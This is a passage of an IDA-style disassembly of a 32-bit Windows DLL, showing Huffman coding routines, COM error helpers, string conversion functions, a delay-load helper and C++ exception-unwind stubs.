; =============== S U B R O U T I N E =======================================
sub_1001C4D0 proc near ; CODE XREF: sub_1001B640:loc_1001B767�p
mov eax, dword_1007411C
test eax, eax
jnz short locret_1001C4EA
call sub_1001BF50
push 0
push 7
call sub_1001B2F0
add esp, 8
locret_1001C4EA: ; CODE XREF: sub_1001C4D0+7�j
retn
sub_1001C4D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001C4F0 proc near ; CODE XREF: sub_1001BF50+18�p
; sub_1001BF50+52�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov edx, [esp+arg_8]
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
mov dword_1007A43C, edx
push ebp
mov dword_1007A434, eax
xor edx, edx
mov ebp, ecx
xor eax, eax
cmp ecx, edx
mov dword_1007A438, ecx
mov [esp+4+arg_4], ebp
mov dword_1007A440, edx
mov word_1007A46E, dx
jle short loc_1001C568
loc_1001C529: ; CODE XREF: sub_1001C4F0+6C�j
mov ecx, dword_1007A43C
mov [ecx+eax], dl
mov ecx, dword_1007A434
cmp [ecx+eax*2], dx
jz short loc_1001C553
mov ecx, dword_1007A440
inc ecx
mov dword_1007A440, ecx
mov word_1007A46C[ecx*2], ax
loc_1001C553: ; CODE XREF: sub_1001C4F0+4C�j
mov ecx, dword_1007A438
inc eax
cmp eax, ecx
jl short loc_1001C529
mov eax, dword_1007A440
cmp eax, 2
jge short loc_1001C580
loc_1001C568: ; CODE XREF: sub_1001C4F0+37�j
movsx eax, word_1007A46E
mov ecx, [esp+4+arg_C]
pop ebp
mov [ecx+eax*2], dx
movsx eax, word_1007A46E
retn
; ---------------------------------------------------------------------------
loc_1001C580: ; CODE XREF: sub_1001C4F0+76�j
cdq
push ebx
sub eax, edx
push esi
mov esi, eax
sar esi, 1
cmp esi, 1
push edi
jl short loc_1001C59E
loc_1001C58F: ; CODE XREF: sub_1001C4F0+AC�j
push esi
call sub_1001C800
add esp, 4
dec esi
cmp esi, 1
jge short loc_1001C58F
loc_1001C59E: ; CODE XREF: sub_1001C4F0+9D�j
mov edx, [esp+10h+arg_C]
mov dword_1007A444, edx
jmp short loc_1001C5AE
; ---------------------------------------------------------------------------
loc_1001C5AA: ; CODE XREF: sub_1001C4F0+171�j
mov ebp, [esp+10h+arg_4]
loc_1001C5AE: ; CODE XREF: sub_1001C4F0+B8�j
movsx ebx, word_1007A46E
cmp ebx, dword_1007A438
jge short loc_1001C5D2
mov eax, dword_1007A444
mov [eax], bx
mov eax, dword_1007A444
add eax, 2
mov dword_1007A444, eax
loc_1001C5D2: ; CODE XREF: sub_1001C4F0+CB�j
mov eax, dword_1007A440
push 1
mov cx, word_1007A46C[eax*2]
dec eax
mov word_1007A46E, cx
mov dword_1007A440, eax
call sub_1001C800
movsx edi, word_1007A46E
mov eax, dword_1007A438
add esp, 4
cmp edi, eax
jge short loc_1001C61C
mov edx, dword_1007A444
mov [edx], di
mov eax, dword_1007A444
add eax, 2
mov dword_1007A444, eax
loc_1001C61C: ; CODE XREF: sub_1001C4F0+114�j
mov eax, [esp+10h+arg_4]
lea esi, [ebp+ebp+0]
inc eax
push 1
mov [esp+14h+arg_4], eax
mov eax, dword_1007A434
mov cx, [eax+edi*2]
add cx, [eax+ebx*2]
mov [esi+eax], cx
mov word_1007A46E, bp
call sub_1001C800
mov eax, dword_1007A440
add esp, 4
cmp eax, 1
mov word_10076380[esi], bx
mov word_100793C0[esi], di
jg loc_1001C5AA
mov esi, [esp+10h+arg_C]
push ebp
mov dword_1007A444, esi
call sub_1001C6A0
mov edx, [esp+14h+arg_8]
mov eax, [esp+14h+arg_0]
push esi
push edx
push eax
call sub_1001C880
add esp, 10h
mov eax, ebp
pop edi
pop esi
pop ebx
pop ebp
retn
sub_1001C4F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001C6A0 proc near ; CODE XREF: sub_1001C4F0+182�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
mov ecx, 8
xor eax, eax
mov edi, offset word_1007A448
rep stosd
stosw
mov eax, [esp+0Ch+arg_0]
push eax
call sub_1001C790
add esp, 4
xor edx, edx
xor ecx, ecx
mov eax, offset word_1007A468
mov ebx, 2
loc_1001C6CE: ; CODE XREF: sub_1001C6A0+3F�j
xor esi, esi
mov si, [eax]
sub eax, ebx
shl esi, cl
add edx, esi
inc ecx
cmp eax, offset word_1007A448
jg short loc_1001C6CE
cmp edx, 10000h
jz short loc_1001C746
mov esi, ds:fprintf
lea edi, [edx-10000h]
loc_1001C6F5: ; CODE XREF: sub_1001C6A0+A4�j
mov ecx, ds:_iob
push offset a17 ; "17"
add ecx, 40h
push ecx ; File
call esi ; fprintf
add esp, 8
dec word_1007A468
mov ecx, 0Fh
mov eax, offset word_1007A466
loc_1001C71A: ; CODE XREF: sub_1001C6A0+88�j
cmp word ptr [eax], 0
jnz short loc_1001C72C
sub eax, ebx
dec ecx
cmp eax, offset word_1007A448
jg short loc_1001C71A
jmp short loc_1001C743
; ---------------------------------------------------------------------------
loc_1001C72C: ; CODE XREF: sub_1001C6A0+7E�j
dec word_1007A448[ecx*2]
add word_1007A44A[ecx*2], bx
lea eax, word_1007A44A[ecx*2]
loc_1001C743: ; CODE XREF: sub_1001C6A0+8A�j
dec edi
jnz short loc_1001C6F5
loc_1001C746: ; CODE XREF: sub_1001C6A0+47�j
mov eax, 10h
mov edx, offset word_1007A468
loc_1001C750: ; CODE XREF: sub_1001C6A0+E7�j
xor ecx, ecx
mov cx, [edx]
dec ecx
js short loc_1001C77E
inc ecx
loc_1001C759: ; CODE XREF: sub_1001C6A0+DC�j
mov edi, dword_1007A444
xor esi, esi
mov si, [edi]
mov edi, dword_1007A43C
mov [esi+edi], al
mov edi, dword_1007A444
add edi, ebx
dec ecx
mov dword_1007A444, edi
jnz short loc_1001C759
loc_1001C77E: ; CODE XREF: sub_1001C6A0+B6�j
sub edx, ebx
dec eax
cmp edx, offset word_1007A448
jg short loc_1001C750
pop edi
pop esi
pop ebx
retn
sub_1001C6A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001C790 proc near ; CODE XREF: sub_1001C6A0+18�p
; sub_1001C790+3F�p ...
arg_0 = dword ptr 4
mov eax, dword_1007A438
push esi
mov esi, [esp+4+arg_0]
cmp esi, eax
jge short loc_1001C7B7
mov eax, dword_1007A86C
cmp eax, 10h
jl short loc_1001C7AD
mov eax, 10h
loc_1001C7AD: ; CODE XREF: sub_1001C790+16�j
inc word_1007A448[eax*2]
pop esi
retn
; ---------------------------------------------------------------------------
loc_1001C7B7: ; CODE XREF: sub_1001C790+C�j
mov edx, dword_1007A86C
xor eax, eax
mov ax, word_10076380[esi*2]
inc edx
push eax
mov dword_1007A86C, edx
call sub_1001C790
xor ecx, ecx
mov cx, word_100793C0[esi*2]
push ecx
call sub_1001C790
mov eax, dword_1007A86C
add esp, 8
dec eax
mov dword_1007A86C, eax
pop esi
retn
sub_1001C790 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001C800 proc near ; CODE XREF: sub_1001C4F0+A0�p
; sub_1001C4F0+FE�p ...
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, dword_1007A440
push ebx
push ebp
lea eax, [edx+edx]
push esi
push edi
cmp eax, ecx
movsx edi, word_1007A46C[eax]
jg short loc_1001C86A
mov esi, dword_1007A434
loc_1001C822: ; CODE XREF: sub_1001C800+68�j
jge short loc_1001C83F
movsx ebx, word_1007A46C[eax*2]
movsx ecx, word_1007A46E[eax*2]
mov bx, [esi+ebx*2]
cmp bx, [esi+ecx*2]
jbe short loc_1001C83F
inc eax
loc_1001C83F: ; CODE XREF: sub_1001C800:loc_1001C822�j
; sub_1001C800+3C�j
mov cx, word_1007A46C[eax*2]
mov bp, [esi+edi*2]
movsx ebx, cx
cmp bp, [esi+ebx*2]
jbe short loc_1001C86A
mov word_1007A46C[edx*2], cx
mov ecx, dword_1007A440
mov edx, eax
add eax, eax
cmp eax, ecx
jle short loc_1001C822
loc_1001C86A: ; CODE XREF: sub_1001C800+1A�j
; sub_1001C800+52�j
mov word_1007A46C[edx*2], di
pop edi
pop esi
pop ebp
pop ebx
retn
sub_1001C800 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001C880 proc near ; CODE XREF: sub_1001C4F0+192�p
var_24 = word ptr -24h
var_22 = word ptr -22h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 24h
mov [esp+24h+var_22], 0
xor eax, eax
loc_1001C88C: ; CODE XREF: sub_1001C880+25�j
mov cx, word_1007A44A[eax]
add cx, [esp+eax+24h+var_22]
add eax, 2
shl ecx, 1
mov [esp+eax+24h+var_22], cx
cmp eax, 1Eh
jle short loc_1001C88C
push edi
mov edi, [esp+28h+arg_0]
xor eax, eax
test edi, edi
jle short loc_1001C8E0
mov edx, [esp+28h+arg_8]
push esi
mov esi, [esp+2Ch+arg_4]
loc_1001C8BB: ; CODE XREF: sub_1001C880+5D�j
xor ecx, ecx
add edx, 2
mov cl, [eax+esi]
mov cx, [esp+ecx*2+2Ch+var_24]
mov [edx-2], cx
xor ecx, ecx
mov cl, [eax+esi]
inc [esp+ecx*2+2Ch+var_24]
lea ecx, [esp+ecx*2+2Ch+var_24]
inc eax
cmp eax, edi
jl short loc_1001C8BB
pop esi
loc_1001C8E0: ; CODE XREF: sub_1001C880+30�j
pop edi
add esp, 24h
retn
sub_1001C880 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1001C8F0 proc near ; CODE XREF: std::ios_base::register_callback(void (*)(std::ios_base::event,std::ios_base &,int),int)+72�p
; sub_1000D780+3C�p ...
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_1001CAE2
retn 4
sub_1001C8F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1001C8FE proc near ; CODE XREF: sub_1000CF90+37�p
; sub_1000CFE0+3B�p ...
pperrinfo = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
and [ebp+pperrinfo], 0
test eax, eax
jz short loc_1001C950
mov ecx, [eax]
lea edx, [ebp+arg_4]
push edx
push offset dword_10024158
push eax
call dword ptr [ecx]
test eax, eax
jl short loc_1001C950
mov eax, [ebp+arg_4]
push esi
push [ebp+arg_8]
mov ecx, [eax]
push eax
call dword ptr [ecx+0Ch]
mov esi, eax
mov eax, [ebp+arg_4]
push eax
mov ecx, [eax]
call dword ptr [ecx+8]
test esi, esi
pop esi
jnz short loc_1001C950
lea eax, [ebp+pperrinfo]
push eax ; pperrinfo
push 0 ; dwReserved
call ds:GetErrorInfo
test eax, eax
jz short loc_1001C950
and [ebp+pperrinfo], 0
loc_1001C950: ; CODE XREF: sub_1001C8FE+D�j
; sub_1001C8FE+1F�j ...
push [ebp+pperrinfo]
push [ebp+arg_0]
call sub_1001CAE2
leave
retn 0Ch
sub_1001C8FE endp
; =============== S U B R O U T I N E =======================================
sub_1001C95F proc near ; DATA XREF: .data:1002201C�o
; FUNCTION CHUNK AT 1001C97B SIZE 0000000C BYTES
call sub_1001C969
jmp loc_1001C97B
sub_1001C95F endp
; =============== S U B R O U T I N E =======================================
sub_1001C969 proc near ; CODE XREF: sub_1001C95F�p
push 0Ah
push 80020004h
mov ecx, offset pvarg
call sub_1001CA86
retn
sub_1001C969 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_1001C95F
loc_1001C97B: ; CODE XREF: sub_1001C95F+5�j
push offset sub_1001C987 ; void (__cdecl *)()
call _atexit
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_1001C95F
; =============== S U B R O U T I N E =======================================
; void __cdecl sub_1001C987()
sub_1001C987 proc near ; DATA XREF: sub_1001C95F:loc_1001C97B�o
push offset pvarg ; pvarg
call ds:VariantClear
test eax, eax
jge short locret_1001C99C
push eax
call sub_1001C8F0
locret_1001C99C: ; CODE XREF: sub_1001C987+D�j
retn
sub_1001C987 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_1001C99D(LPCSTR lpMultiByteStr)
sub_1001C99D proc near ; CODE XREF: sub_1000D780+1F�p
lpMultiByteStr = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+lpMultiByteStr], 0
push esi
push edi
jnz short loc_1001C9AC
xor eax, eax
jmp short loc_1001CA09
; ---------------------------------------------------------------------------
loc_1001C9AC: ; CODE XREF: sub_1001C99D+9�j
push [ebp+lpMultiByteStr] ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call __alloca_probe
mov edi, esp
push esi ; cchWideChar
push edi ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
and word ptr [edi], 0
push 0 ; dwFlags
push 0 ; CodePage
call ds:MultiByteToWideChar ; MultiByteToWideChar
test eax, eax
jnz short loc_1001CA02
mov esi, ds:GetLastError
call esi ; GetLastError
test eax, eax
jz short loc_1001C9FA
call esi ; GetLastError
and eax, 0FFFFh
or eax, 80070000h
jmp short loc_1001C9FC
; ---------------------------------------------------------------------------
loc_1001C9FA: ; CODE XREF: sub_1001C99D+4D�j
xor eax, eax
loc_1001C9FC: ; CODE XREF: sub_1001C99D+5B�j
push eax
call sub_1001C8F0
loc_1001CA02: ; CODE XREF: sub_1001C99D+41�j
push edi ; psz
call ds:SysAllocString
loc_1001CA09: ; CODE XREF: sub_1001C99D+D�j
lea esp, [ebp-8]
pop edi
pop esi
pop ebp
retn 4
sub_1001C99D endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_1001CA12(wchar_t *lpWideCharStr)
sub_1001CA12 proc near ; CODE XREF: sub_1000D870+16�p
lpWideCharStr = dword ptr 4
push ebx
push ebp
mov ebp, [esp+8+lpWideCharStr]
xor ebx, ebx
cmp ebp, ebx
jnz short loc_1001CA22
xor eax, eax
jmp short loc_1001CA81
; ---------------------------------------------------------------------------
loc_1001CA22: ; CODE XREF: sub_1001CA12+A�j
push esi
push edi
push ebp ; Str
call wcslen ; wcslen
lea edi, [eax+eax+2]
push edi ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jnz short loc_1001CA46
push 8007000Eh
call sub_1001C8F0
loc_1001CA46: ; CODE XREF: sub_1001CA12+28�j
push ebx ; lpUsedDefaultChar
push ebx ; lpDefaultChar
push edi ; cbMultiByte
push esi ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push ebp ; lpWideCharStr
push ebx ; dwFlags
push ebx ; CodePage
mov [esi], bl
call ds:WideCharToMultiByte ; WideCharToMultiByte
test eax, eax
jnz short loc_1001CA7D
mov edi, ds:GetLastError
call edi ; GetLastError
test eax, eax
jz short loc_1001CA75
call edi ; GetLastError
and eax, 0FFFFh
or eax, 80070000h
jmp short loc_1001CA77
; ---------------------------------------------------------------------------
loc_1001CA75: ; CODE XREF: sub_1001CA12+53�j
xor eax, eax
loc_1001CA77: ; CODE XREF: sub_1001CA12+61�j
push eax
call sub_1001C8F0
loc_1001CA7D: ; CODE XREF: sub_1001CA12+47�j
mov eax, esi
pop edi
pop esi
loc_1001CA81: ; CODE XREF: sub_1001CA12+E�j
pop ebp
pop ebx
retn 4
sub_1001CA12 endp
; =============== S U B R O U T I N E =======================================
sub_1001CA86 proc near ; CODE XREF: sub_1001C969+C�p
arg_0 = dword ptr 4
arg_4 = word ptr 8
push esi
push edi
mov di, [esp+8+arg_4]
mov esi, ecx
cmp di, 3
jz short loc_1001CAAB
cmp di, 0Ah
jz short loc_1001CAB1
cmp di, 0Bh
jz short loc_1001CAAB
push 80070057h
call sub_1001C8F0
loc_1001CAAB: ; CODE XREF: sub_1001CA86+D�j
; sub_1001CA86+19�j
cmp di, 0Ah
jnz short loc_1001CAB8
loc_1001CAB1: ; CODE XREF: sub_1001CA86+13�j
mov word ptr [esi], 0Ah
jmp short loc_1001CAD4
; ---------------------------------------------------------------------------
loc_1001CAB8: ; CODE XREF: sub_1001CA86+29�j
cmp di, 0Bh
jnz short loc_1001CACF
mov eax, [esp+8+arg_0]
mov [esi], di
neg eax
sbb eax, eax
mov [esi+8], ax
jmp short loc_1001CADB
; ---------------------------------------------------------------------------
loc_1001CACF: ; CODE XREF: sub_1001CA86+36�j
mov word ptr [esi], 3
loc_1001CAD4: ; CODE XREF: sub_1001CA86+30�j
mov eax, [esp+8+arg_0]
mov [esi+8], eax
loc_1001CADB: ; CODE XREF: sub_1001CA86+47�j
mov eax, esi
pop edi
pop esi
retn 8
sub_1001CA86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1001CAE2 proc near ; CODE XREF: sub_1001C8F0+6�p
; sub_1001C8FE+58�p
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0
lea ecx, [ebp+var_10]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_1001CB06
lea eax, [ebp+var_10]
push offset dword_10020450
push eax
call _CxxThrowException ; _CxxThrowException
sub_1001CAE2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_1001CB06 proc near ; CODE XREF: sub_1001CAE2+11�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov eax, [esp+arg_0]
push esi
mov esi, ecx
and dword ptr [esi+0Ch], 0
mov [esi+4], eax
mov eax, [esp+4+arg_4]
mov dword ptr [esi], offset off_1001FB60
test eax, eax
mov [esi+8], eax
jz short loc_1001CB32
cmp [esp+4+arg_8], 0
jz short loc_1001CB32
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_1001CB32: ; CODE XREF: sub_1001CB06+1D�j
; sub_1001CB06+24�j
mov eax, esi
pop esi
retn 0Ch
sub_1001CB06 endp
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_1001CB38(void *, char)
sub_1001CB38 proc near ; DATA XREF: .rdata:off_1001FB60�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_1001CB81
test [esp+4+arg_0], 1
jz short loc_1001CB4E
push esi ; void *
call ??3@YAXPAX@Z ; operator delete(void *)
pop ecx
loc_1001CB4E: ; CODE XREF: sub_1001CB38+D�j
mov eax, esi
pop esi
retn 4
sub_1001CB38 endp
; =============== S U B R O U T I N E =======================================
sub_1001CB54 proc near ; DATA XREF: .rdata:10020440�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
mov esi, ecx
mov ecx, [eax+4]
mov [esi+4], ecx
mov eax, [eax+8]
and dword ptr [esi+0Ch], 0
mov [esi+8], eax
test eax, eax
mov dword ptr [esi], offset off_1001FB60
jz short loc_1001CB7B
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_1001CB7B: ; CODE XREF: sub_1001CB54+1F�j
mov eax, esi
pop esi
retn 4
sub_1001CB54 endp
; =============== S U B R O U T I N E =======================================
sub_1001CB81 proc near ; CODE XREF: sub_1001CB38+3�p
; DATA XREF: .rdata:10020454�o
push esi
mov esi, ecx
mov eax, [esi+8]
mov dword ptr [esi], offset off_1001FB60
test eax, eax
jz short loc_1001CB97
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_1001CB97: ; CODE XREF: sub_1001CB81+E�j
mov esi, [esi+0Ch]
test esi, esi
jz short loc_1001CBA5
push esi ; hMem
call ds:LocalFree ; LocalFree
loc_1001CBA5: ; CODE XREF: sub_1001CB81+1B�j
pop esi
retn
sub_1001CB81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_1001CBA7(int, ULONG_PTR Arguments)
sub_1001CBA7 proc near ; CODE XREF: GdipGetImageEncodersSize_thunk+11�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
lpLibFileName = dword ptr -18h
var_14 = dword ptr -14h
lpProcName = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Arguments = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
mov ecx, [ebp+Arguments]
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
xor ebx, ebx
mov eax, [esi+4]
lea edi, [ebp+lpProcName]
mov [ebp+lpLibFileName], eax
xor eax, eax
mov [ebp+var_24], 24h
mov [ebp+var_20], esi
mov [ebp+var_1C], ecx
mov [ebp+var_14], ebx
stosd
mov eax, [esi+8]
mov [ebp+var_C], ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov edi, [eax]
mov eax, ecx
sub eax, [esi+0Ch]
sar eax, 2
mov ecx, eax
mov eax, [esi+10h]
shl ecx, 2
add eax, ecx
mov [ebp+arg_0], ecx
mov ecx, [eax]
not ecx
shr ecx, 1Fh
mov [ebp+var_14], ecx
mov eax, [eax]
jz short loc_1001CC09
inc eax
inc eax
jmp short loc_1001CC0E
; ---------------------------------------------------------------------------
loc_1001CC09: ; CODE XREF: sub_1001CBA7+5C�j
and eax, 0FFFFh
loc_1001CC0E: ; CODE XREF: sub_1001CBA7+60�j
mov [ebp+lpProcName], eax
mov eax, dword_1007A888
cmp eax, ebx
jz short loc_1001CC2B
lea ecx, [ebp+var_24]
push ecx
push ebx
call eax ; dword_1007A888
mov ebx, eax
test ebx, ebx
jnz loc_1001CD7C
loc_1001CC2B: ; CODE XREF: sub_1001CBA7+71�j
test edi, edi
jnz loc_1001CCD5
mov eax, dword_1007A888
test eax, eax
jz short loc_1001CC4A
lea ecx, [ebp+var_24]
push ecx
push 1
call eax ; dword_1007A888
mov edi, eax
test edi, edi
jnz short loc_1001CC9A
loc_1001CC4A: ; CODE XREF: sub_1001CBA7+93�j
push [ebp+lpLibFileName] ; lpLibFileName
call ds:LoadLibraryA ; LoadLibraryA
mov edi, eax
test edi, edi
jnz short loc_1001CC9A
call ds:GetLastError
mov [ebp+var_4], eax
mov eax, dword_1007A884
test eax, eax
jz short loc_1001CC79
lea ecx, [ebp+var_24]
push ecx
push 3
call eax ; dword_1007A884
mov edi, eax
test edi, edi
jnz short loc_1001CC9A
loc_1001CC79: ; CODE XREF: sub_1001CBA7+C2�j
lea eax, [ebp+var_24]
mov [ebp+Arguments], eax
lea eax, [ebp+Arguments]
push eax ; lpArguments
push 1 ; nNumberOfArguments
push 0 ; dwExceptionFlags
push 0C06D007Eh ; dwExceptionCode
call ds:RaiseException ; RaiseException
mov eax, [ebp+var_8]
jmp loc_1001CD99
; ---------------------------------------------------------------------------
loc_1001CC9A: ; CODE XREF: sub_1001CBA7+A1�j
; sub_1001CBA7+B0�j ...
push edi ; Value
push dword ptr [esi+8] ; Target
call ds:InterlockedExchange ; InterlockedExchange
cmp eax, edi
jz short loc_1001CCCE
cmp dword ptr [esi+18h], 0
jz short loc_1001CCD5
push 8 ; uBytes
push 40h ; uFlags
call ds:LocalAlloc ; LocalAlloc
test eax, eax
jz short loc_1001CCD5
mov [eax+4], esi
mov ecx, dword_1007A880
mov [eax], ecx
mov dword_1007A880, eax
jmp short loc_1001CCD5
; ---------------------------------------------------------------------------
loc_1001CCCE: ; CODE XREF: sub_1001CBA7+FF�j
push edi ; hLibModule
call ds:FreeLibrary ; FreeLibrary
loc_1001CCD5: ; CODE XREF: sub_1001CBA7+86�j
; sub_1001CBA7+105�j ...
mov eax, dword_1007A888
mov [ebp+var_C], edi
test eax, eax
jz short loc_1001CCEB
lea ecx, [ebp+var_24]
push ecx
push 2
call eax ; dword_1007A888
mov ebx, eax
loc_1001CCEB: ; CODE XREF: sub_1001CBA7+138�j
test ebx, ebx
jnz loc_1001CD77
mov edx, [esi+14h]
test edx, edx
jz short loc_1001CD2C
mov ecx, [esi+1Ch]
test ecx, ecx
jz short loc_1001CD2C
mov eax, [edi+3Ch]
add eax, edi
cmp dword ptr [eax], 4550h
jnz short loc_1001CD2C
cmp [eax+8], ecx
jnz short loc_1001CD2C
cmp edi, [eax+34h]
jnz short loc_1001CD2C
push edx
push dword ptr [esi+0Ch]
call sub_1001CDA0
mov eax, [esi+0Ch]
mov ecx, [ebp+arg_0]
mov ebx, [ecx+eax]
jmp short loc_1001CD7C
; ---------------------------------------------------------------------------
loc_1001CD2C: ; CODE XREF: sub_1001CBA7+151�j
; sub_1001CBA7+158�j ...
push [ebp+lpProcName] ; lpProcName
push edi ; hModule
call ds:GetProcAddress ; GetProcAddress
mov ebx, eax
test ebx, ebx
jnz short loc_1001CD77
call ds:GetLastError
mov [ebp+var_4], eax
mov eax, dword_1007A884
test eax, eax
jz short loc_1001CD58
lea ecx, [ebp+var_24]
push ecx
push 4
call eax ; dword_1007A884
mov ebx, eax
loc_1001CD58: ; CODE XREF: sub_1001CBA7+1A5�j
test ebx, ebx
jnz short loc_1001CD77
lea eax, [ebp+var_24]
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push eax ; lpArguments
push 1 ; nNumberOfArguments
push ebx ; dwExceptionFlags
push 0C06D007Fh ; dwExceptionCode
call ds:RaiseException ; RaiseException
mov ebx, [ebp+var_8]
loc_1001CD77: ; CODE XREF: sub_1001CBA7+146�j
; sub_1001CBA7+193�j ...
mov eax, [ebp+Arguments]
mov [eax], ebx
loc_1001CD7C: ; CODE XREF: sub_1001CBA7+7E�j
; sub_1001CBA7+183�j
mov eax, dword_1007A888
test eax, eax
jz short loc_1001CD97
and [ebp+var_4], 0
lea ecx, [ebp+var_24]
push ecx
push 5
mov [ebp+var_C], edi
mov [ebp+var_8], ebx
call eax ; dword_1007A888
loc_1001CD97: ; CODE XREF: sub_1001CBA7+1DC�j
mov eax, ebx
loc_1001CD99: ; CODE XREF: sub_1001CBA7+EE�j
pop edi
pop esi
pop ebx
leave
retn 8
sub_1001CBA7 endp
; =============== S U B R O U T I N E =======================================
sub_1001CDA0 proc near ; CODE XREF: sub_1001CBA7+175�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
xor ecx, ecx
mov eax, edi
cmp [edi], ecx
jz short loc_1001CDB7
loc_1001CDAE: ; CODE XREF: sub_1001CDA0+15�j
add eax, 4
inc ecx
cmp dword ptr [eax], 0
jnz short loc_1001CDAE
loc_1001CDB7: ; CODE XREF: sub_1001CDA0+C�j
mov esi, [esp+8+arg_4]
rep movsd
pop edi
pop esi
retn 8
sub_1001CDA0 endp
; [00000006 BYTES: COLLAPSED FUNCTION _EH_prolog. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_1001CDC8(void *, char)
sub_1001CDC8 proc near ; DATA XREF: .rdata:off_1001FB68�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call ??1type_info@@UAE@XZ ; type_info::~type_info(void)
test [esp+4+arg_0], 1
jz short loc_1001CDDE
push esi ; void *
call ??3@YAXPAX@Z ; operator delete(void *)
pop ecx
loc_1001CDDE: ; CODE XREF: sub_1001CDC8+D�j
mov eax, esi
pop esi
retn 4
sub_1001CDC8 endp
; [00000006 BYTES: COLLAPSED FUNCTION _CxxThrowException. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION type_info::~type_info(void). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_1001CDF0 proc near ; DATA XREF: .rdata:stru_1001FC00�o
lea ecx, [ebp-334h]
call sub_1000E1D0
retn
sub_1001CDF0 endp
; =============== S U B R O U T I N E =======================================
sub_1001CDFC proc near ; DATA XREF: .rdata:stru_1001FC00�o
lea ecx, [ebp-330h]
call sub_1000E1D0
retn
sub_1001CDFC endp
; =============== S U B R O U T I N E =======================================
sub_1001CE08 proc near ; DATA XREF: .rdata:stru_1001FC00�o
lea ecx, [ebp-584h]
call sub_1000E1D0
retn
sub_1001CE08 endp
; =============== S U B R O U T I N E =======================================
sub_1001CE14 proc near ; DATA XREF: .rdata:stru_1001FC00�o
lea ecx, [ebp-590h]
call sub_1000E1D0
retn
sub_1001CE14 endp
; =============== S U B R O U T I N E =======================================
SEH_100020B5 proc near ; DATA XREF: sub_100020B5+5�o
mov eax, offset stru_1001FC00
jmp __CxxFrameHandler
SEH_100020B5 endp
; =============== S U B R O U T I N E =======================================
sub_1001CE2A proc near ; DATA XREF: .rdata:stru_1001FC40�o
lea ecx, [ebp-11Ch]
call sub_1000EA94
retn
sub_1001CE2A endp
; =============== S U B R O U T I N E =======================================
sub_1001CE36 proc near ; DATA XREF: .rdata:stru_1001FC40�o
lea ecx, [ebp-12Ch]
call sub_1000D180
retn
sub_1001CE36 endp
; =============== S U B R O U T I N E =======================================
SEH_10002FDE proc near ; DATA XREF: TimerFunc+5�o
mov eax, offset stru_1001FC40
jmp __CxxFrameHandler
SEH_10002FDE endp
; =============== S U B R O U T I N E =======================================
sub_1001CE4C proc near ; DATA XREF: .rdata:stru_1001FC70�o
lea ecx, [ebp-18h]
call sub_1000D620
retn
sub_1001CE4C endp
; =============== S U B R O U T I N E =======================================
sub_1001CE55 proc near ; DATA XREF: .rdata:stru_1001FC70�o
lea ecx, [ebp-14h]
call sub_1000D620
retn
sub_1001CE55 endp
; =============== S U B R O U T I N E =======================================
sub_1001CE5E proc near ; DATA XREF: .rdata:stru_1001FC70�o
lea ecx, [ebp-168h]
call sub_1000DA90
retn
